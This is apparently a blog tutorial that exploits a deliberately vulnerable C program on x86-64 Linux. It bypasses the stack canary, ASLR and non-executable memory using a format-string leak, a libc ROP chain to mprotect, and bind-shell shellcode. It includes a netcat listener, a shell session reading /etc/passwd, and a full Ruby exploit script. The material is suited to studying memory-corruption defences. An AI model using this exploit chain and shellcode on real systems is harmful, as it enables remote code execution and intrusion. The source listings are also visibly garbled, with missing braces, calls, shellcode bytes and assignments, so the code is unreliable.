Bypassing non-executable memory, ASLR and stack canaries on x86-64 Linux

03 May 2014

This post will walk you through the exploitation of a vulnerable program on a modern x86-64 Linux system. The program was deliberately written vulnerable and we will bypass modern exploit mitigation techniques like non-executable memory, ASLR and stack canaries. The motivation of doing this is to get a basic understanding of how memory corruption vulnerabilities can be exploited on x86-64 Linux systems under the presence of a memory leak and a stack based buffer overflow.

Let's start with the vulnerable code vuln.c:

#include <stdio.h>
#include <string.h>

#define STDIN 0

void memLeak() {
    char buf[512];
    scanf("%s", buf);

void vulnFunc() {
    char buf[1024];
    read(STDIN, buf, 2048);

int main(int argc, char* argv[]) {

    setbuf(stdout, NULL);
    printf("echo> ");
    printf("read> ");


    return 0;


Compile the program with gcc -o vuln vuln.c on a x86-64 Linux with gcc (I am using Ubuntu 12.04 LTS with gcc 4.6.3).

What does the program do? Actually not much. It will ask the user for some input. The first time it will echo it back and the second time it will just read the input. The buffers where the inputs are stored are local and therefore on the function stack. If you look at the source you will spot at least two very ugly things. First, memLeak() will print the string back by using printf(buf) which allows the user to provide format strings and thus leads to a format string vulnerability. And second, vulnFunc() will read 2048 bytes into a 1024 bytes buffer on the stack which results in a stack based buffer overflow.

Run the program by executing nc.traditional -l -p 1234 -e ./vuln. You can then interact with it by telnet <ip address> 1234 or telnet localhost 1234 if you are on the same host.

user@host:~$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
echo> hello 
read> nice

Connection closed by foreign host.

Let's try something else...

Start the vulnerable program again:

user@host:~$ nc.traditional -l -p 1234 -c ./vuln 

This time let's input something rather unexpected:

user@host:~$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
echo> %llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx
Connection closed by foreign host.

Watch the output of the vulnerable program:

user@host:~$ nc.traditional -l -p 1234 -c ./vuln 
*** stack smashing detected ***: ./vuln terminated
Segmentation fault

Obviously something went wrong here. The program did not echo back the string we typed and instead of normal termination it segfaulted.

Because of the unsafe use of printf() we were able to provide a string with format specifiers %llx i.e. a format string. The format string we provided instructed printf() to print its 8 byte integer "arguments" as hexadecimal values. Yes, printf() will just assume that memLeak() passed some "arguments" along and it will trust the format string and its format specifiers. The values printed are values that printf() finds at the locations it would normally expect arguments. In x86 32bit this would have been the stack (see here). In x86-64 the first six integer arguments are passed in registers (%rdi, %rsi, %rdx, %rcx, %r8, %r9) and the remaining arguments on the stack. Because printf() actually gets one real argument namely the pointer to buf (passed in %rdi), it will expect the next 5 arguments within the remaining registers and everything else on the stack. This is what we actually see in the output echoed back to us. 1 is the content of %rsi and 7ff78e041ac0 was in %rdx right before printf() was called. 6c6c252c786c6c25 thus are the first 8 bytes on the stack. As it's little endian the LSB is 0x25 which corresponds to the character % in ASCII. This is the first character in our input that now resides on the stack. By providing more format specifiers we are now able to read out the process stack.

But why did the program segfault? Actually, the segfault was due to a detected stack overflow.

0000000000400794 <vulnFunc>:
  400794:   55                      push   %rbp
  400795:   48 89 e5                mov    %rsp,%rbp
  400798:   48 81 ec 10 04 00 00    sub    $0x410,%rsp
  40079f:   64 48 8b 04 25 28 00    mov    %fs:0x28,%rax
  4007a6:   00 00 
  4007a8:   48 89 45 f8             mov    %rax,-0x8(%rbp)
  4007ac:   31 c0                   xor    %eax,%eax
  4007ae:   48 8d 85 f0 fb ff ff    lea    -0x410(%rbp),%rax
  4007b5:   ba 00 08 00 00          mov    $0x800,%edx
  4007ba:   48 89 c6                mov    %rax,%rsi
  4007bd:   bf 00 00 00 00          mov    $0x0,%edi
  4007c2:   b8 00 00 00 00          mov    $0x0,%eax
  4007c7:   e8 54 fe ff ff          callq  400620 <read@plt>
  4007cc:   48 8b 45 f8             mov    -0x8(%rbp),%rax
  4007d0:   64 48 33 04 25 28 00    xor    %fs:0x28,%rax
  4007d7:   00 00 
  4007d9:   74 05                   je     4007e0 <vulnFunc+0x4c>
  4007db:   e8 10 fe ff ff          callq  4005f0 <__stack_chk_fail@plt>
  4007e0:   c9                      leaveq 
  4007e1:   c3                      retq

Let's have a look at the vulnFunc() x86-64 machine code. You can dissassemble the ELF executable with objdump (objdump -d vuln). When we look at the function prologue we will notice mov %fs:0x28,%rax and mov %rax,-0x8(%rbp). This will move a 64 bit value from %fs:0x28 to %rax and then from %rax to the first 8 bytes right below the base pointer %rbp. This value is called stack canary and it is random for each process. For more on how this stack canary mechanism is implemented see this blog post (x86-64 should be similar). The value will thus change for each program invocation but it remains the same for every function that uses stack canaries. Gcc decides for each function upon certain criterias if it will emit stack canaries or not (you can disable it with -fno-stack-protector). There is also -fstack-protector-all to enable it for all functions. Apparently in gcc 4.9 a new option -fstack-protector-strong will be introduced which will enable stack canaries for more functions, see this blog post for more details.

So what is the purpose of this canary value? As it's placed right at the beginning of the new function stack and therefore before any other local buffer, in case a local buffer overflows this value will be overwritten. Verifying if the value changed at function exit will indicate if a buffer overflowed. The stack canary is verified at 4007cc - 4007db before function exit and in case the value changed __stack_chk_fail is called. This function resides within libc and somewhere down the __stack_chk_fail road a segfault happens.

The stack canary will therefore indicate if a buffer overflow occured on the function stack. Of course overflows affecting only local buffers (not reaching the canary value) will not be detected by this. The most sensitive value usually protected by a stack canary is the return instruction pointer that resides right after the %rbp value pushed at the beginning of the function. Since a call instruction pushes the return address onto the stack right before transferring control to the function this value resides on the stack followed by %rbp, the stack canary and the local buffers and variables. Read Aleph One's Smashing The Stack For Fun And Profit for a basic introduction (and more) on stack based buffer overflows (note: the article was written before stack canaries were introduced).

If you step through the vulnerable program with gdb you can print the stack canary (e.g. 0xe4437cc224112800) right after mov %fs:0x28,%rax by printing %rax. As mentioned this will change for each program invocation but stays the same throughout function calls.

Now, how can these vulnerabilities be exploited remotely and reliably such that we gain arbitrary code execution?

To hijack the control flow we need to overwrite some function pointer (64 bit value) that is used as an indirect branch target (call*, jmp* or ret). The stack overflow would allow us to overwrite the return address on the stack but we need to bypass the stack canary protection or we end up in __stack_chk_fail. Since we are able to read the stack we can of course read out the stack canary on the memLeak() stack. This value is the same as the one for vulnFunc() so we can "bypass" the stack canary check by just writing the right value as we overflow the buffer. We have to make sure that the stack canary value is written to the exact same place on the stack where it was put before.

Next, with which value should we rewrite the return address on the stack? Before non-executable memory was introduced you could place the code onto the stack and return to it. As the stack is non executable this will not work. But we have plenty of other instructions that are mapped as executable memory. For instance the executable code of the program itself or it's shared libraries.

We will place the code we would like to execute onto the stack (into buf[1024]) through the read in vulndFunc() and we will use already executable code within the process' address space to make the stack executable again. After that we will transfer control to the code on the stack. This is also called a return-oriented programming or a ret2libc/ret2mprotect attack (see here or here for more on this topic).

Changing protection flags of memory mappings can be done by mprotect(). You find mprotect() within the libc and it's actually just a system call wrapper. On x86-64 Linux the syscall number is 0xa (x86-64 Linux syscalls).

See man mprotect for the details:

int mprotect(const void *addr, size_t len, int prot);

*addr is a page aligned address indicating the start of the memory area that should get the new protection flags, len is the size of the memory area and prot are the new protection flags.

Before transferring control to our code placed on the stack we need to call mprotect with the appropriate arguments to make the stack executable and we can then redirect control-flow to the stack where our executable code resides. We still have two issues to solve. First, how do we know the exact addresses of mprotect and the buffer (buf[1024]) on the stack where our code will be placed? Second, how can we actually call mprotect() with the appropriate arguments?

If we use 71 %llx format specifiers the vulnerable program will leak 568 bytes. 40 bytes from registers (%rdi, %rsi, %rdx, %rcx, %r8, %r9) and 528 bytes from the stack. If we look at the disassembled memLeak() function we will notice sub $0x210,%rsp.

0000000000400734 <memLeak>:
  400734:   55                      push   %rbp
  400735:   48 89 e5                mov    %rsp,%rbp
  400738:   48 81 ec 10 02 00 00    sub    $0x210,%rsp
  40073f:   64 48 8b 04 25 28 00    mov    %fs:0x28,%rax
  400746:   00 00 
  400748:   48 89 45 f8             mov    %rax,-0x8(%rbp)
  40074c:   31 c0                   xor    %eax,%eax
  40074e:   b8 4c 09 40 00          mov    $0x40094c,%eax
  400753:   48 8d 95 f0 fd ff ff    lea    -0x210(%rbp),%rdx
  40075a:   48 89 d6                mov    %rdx,%rsi
  40075d:   48 89 c7                mov    %rax,%rdi
  400760:   b8 00 00 00 00          mov    $0x0,%eax
  400765:   e8 d6 fe ff ff          callq  400640 <__isoc99_scanf@plt>
  40076a:   48 8d 85 f0 fd ff ff    lea    -0x210(%rbp),%rax
  400771:   48 89 c7                mov    %rax,%rdi
  400774:   b8 00 00 00 00          mov    $0x0,%eax
  400779:   e8 92 fe ff ff          callq  400610 <printf@plt>
  40077e:   48 8b 45 f8             mov    -0x8(%rbp),%rax
  400782:   64 48 33 04 25 28 00    xor    %fs:0x28,%rax
  400789:   00 00 
  40078b:   74 05                   je     400792 <memLeak+0x5e>
  40078d:   e8 5e fe ff ff          callq  4005f0 <__stack_chk_fail@plt>
  400792:   c9                      leaveq 
  400793:   c3                      retq

0x210 is exactly 528 bytes so we actually leaked the entire memLeak() stack. If we would provide two format specifiers more we would actually see the %rbp value and the return address on the stack. But these 40 + 528 bytes are actually enough to derive all the information we need!

If we try with 71 %llx,%llx,%llx,%llx,%llx,... specifiers you will see:

user@host:~$ telnet localhost 1234
Connected to localhost.
Escape character is '^]'.
echo> %llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx,%llx

The 71th value 5fea3d5e1f0d9300 is actually the stack canary. What's interesting is that the LSB of the stack canary is 0x00. This makes it more difficult to misuse string functions to overflow the stack because string functions terminate when a null byte 0x00 is encountered.

The 2nd is an address pointing to the libc mapped within the process' address space. The offset to the libc base address of this value will remain the same along different program invocations. In my case the offset is 0x3bbac0.

The 62th value points to the stack. Again, the offset to buf[1024] of vulnFunc() will stay the same along different invocations. In my case it's 0x510.

We now have almost everything required for successful exploitation. One last issue remains namely how to call mprotect() with the appropriate arguments. In x86 32bit we would have placed the arguments for mprotect on the stack. But on x86-64 the parameters are passed to mprotect in %rdi, %rsi and %rdx. We therefore need a way to fill these registers with the appropriate values without losing control flow. Ideally, we find a sequence that pops these values into the registers and returns again to an address on the stack. This short instruction sequences ending with an indirect control flow instruction (like ret) are called gadgets. As we have the base of libc we will try to find appropriate gadgets within libc. You can use e.g. rp++ a rop sequence finder or just plain objdump to find such gadgets.

These are the gadgets I found in libc:

  pop %rdi; ret; // at 0x229f2
  pop %rsi; ret; // at 0x23d25
  pop %rdx; ret; // at 0x102105

That's it! This should give us remote code execution. After leaking all the data we need we have to construct a payload with the following structure:

[ bufaddr      ] -> address of the beginning of this buffer mprotect should return to
[ &mprotect    ] -> address of mprotect the third gadget should return to
[ prot arg     ] -> prot arg to be put into %rdx
[ &gadget3     ] -> the third gadget the second should return to (pop %rdx; ret;)
[ size arg     ] -> size arg to be put into %rsi
[ &gadget2     ] -> the second gadget the first should return to (pop %rsi; ret;)
[ addr arg     ] -> addr arg to be put into %rdi
[ &gadget1     ] -> the first gadget vulnFunc() should return to (pop %rdi; ret;)
[ rbp          ] -> value for rbp
[ stack canary ] -> the stack canary leaked
[ padding      ] -> some nop padding
[ shellcode    ] -> our shellcode, will be made executable by mprotect

The address of the first gadget will be placed where vulnFunc()'s return address resides, the stack canary validation will succeed as we replaced it with the exact same value, after the gadget chain our registers contain the right values for mprotect to make our injected code (shellcode) executable and in a last step mprotect's return instruction will transfer control to our shellcode.

The shellcode i.e. the code we inject into the stack will listen on port 4444 on the vulnerable host and provide us a shell after connecting to it (I took the shellcode from here).

Let's try it. Execute the vulnerable program:

user@host:~$ nc.traditional -l -p 1234 -c ./vuln

Exploit the vulnerability (the complete exploit is found further down):

user@host:~$ nc.traditional -c ./exploit.rb localhost 1234

We should now have a bindshell at port 4444. Connect to it:

user@host:~$ telnet localhost 4444
Connected to localhost.
Escape character is '^]'.
ls /;
: not found 
cat /etc/passwd;
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
: not found 

It worked! We gained arbitrary code execution. Here the complete exploit.rb:


require 'open3'
include Open3

# shellcode from
# bindshell on port 4444
shellcode =
"\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2" +
"\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c" +
"\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05" +
"\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89" +
"\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f" +
"\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21" +
"\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68" +
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89" +

popen3('./vuln') do
  |stdin, stdout, stderr|

  stdin.sync = true
  line =
  puts line


  memleak = stdout.readline
  puts memleak 

  line =
  puts line

  # get the required values from the leaked memory 
  # * 71th value is the canary on the stack
  # * 2nd value is an address that points to the
  #   libcbase + some offset (0x3bbac0)
  # * 62th value points into the stack with an offset
  #   (0x510) relative to the buffer in vulnFunc later overflowed
  cookie = memleak.split(',')[70].to_i(16) # 71th value / index 70
  libcbase = memleak.split(',')[1].to_i(16) - 0x3bbac0 # 2nd value / index 1 
  bufaddr = memleak.split(',')[61].to_i(16) - 0x510 # 62th value / index 61 

  ebp = bufaddr + 0x430 # we will overwrite the %rbp value on the stack as well
  mprotect = libcbase + 0xf0800; # mprotect offset in libc
  gadget1 = libcbase + 0x229f2; # pop %rdi; ret;
  gadget2 = libcbase + 0x23d25 # pop %rsi; ret;
  gadget3 = libcbase + 0x102105; # pop %rdx; ret;

  aligned_bufaddr = bufaddr & 0xfffffffffffff000; # align to page boundary
  size = 4096; # page size
  prot = 0x1|0x2|0x4; # what do we want? RWX!

  # "lea    -0x410(%rbp),%rax" -> 0x410 = 1040 - 8 (canary) = 1032
  padding = "\x90" * (1032-shellcode.bytesize) # nop padding of remaining buf 

  puts "\n"
  puts " * exploit"
  puts "  * cookie = " + cookie.to_s(16)
  puts "  * libcbase = " + libcbase.to_s(16) 
  puts "   * mprotect = " + mprotect.to_s(16) 
  puts "   * gadget1 = " + gadget1.to_s(16) 
  puts "   * gadget2 = " + gadget2.to_s(16) 
  puts "   * gadget3 = " + gadget3.to_s(16) 
  puts "  * bufaddr = " + bufaddr.to_s(16)
  puts " * sending/writing payload..."

  # write the actual payload
  # [bufaddr (containing the payload)]
  # [&mprotect]
  # [prot arg for mprotect]
  # [&gadget3]
  # [size arg for mprotect]
  # [&gadget2]
  # [addr arg for mprotect]
  # [&gadget1]
  # [rbp]
  # [stack canary]
  # [ ... shellcode padding ... ]
  # [shellcode]

  stdin.write(shellcode + padding +
   [cookie].pack('Q').to_s() +
   [ebp].pack('Q').to_s() +
   [gadget1].pack('Q').to_s() +
   [aligned_bufaddr].pack('Q').to_s() +
   [gadget2].pack('Q').to_s() +
   [size].pack('Q').to_s() +
   [gadget3].pack('Q').to_s() +
   [prot].pack('Q').to_s() +
   [mprotect].pack('Q').to_s() +

  puts "\n" 


You need to adapt certain offsets to match your system and libc. The ones provided above work for Ubuntu 12.04 LTS.

Well, that's it. We managed to bypass all exploit mitigation techniques currently deployed on modern standard x86-64 Linux systems. What we achieved is arbitrary code execution in the context of the vulnerable program. Depending on the privileges of the process we would also need to elevate our privileges to get full system control.

Memory corruption vulnerabilities are still a problem today. Although reliable exploitation got much more difficult it is still possible under certain circumstances. With the wide deployment of non-executable memory (DEP on Windows) and ASLR (full or partial) memory leaks are essential for reliable exploitation.

So what could be further done to harden software systems against the exploitation of memory corruption vulnerabilities?

Beside not using unsafe languages unless really required you should of course try to write safe code and verify your code statically and dynamically.

Other interesting compile-time techniques are SoftBound + CETS or Control-Flow Integrity (CFI) policies.

I hope you enjoyed reading this blog post!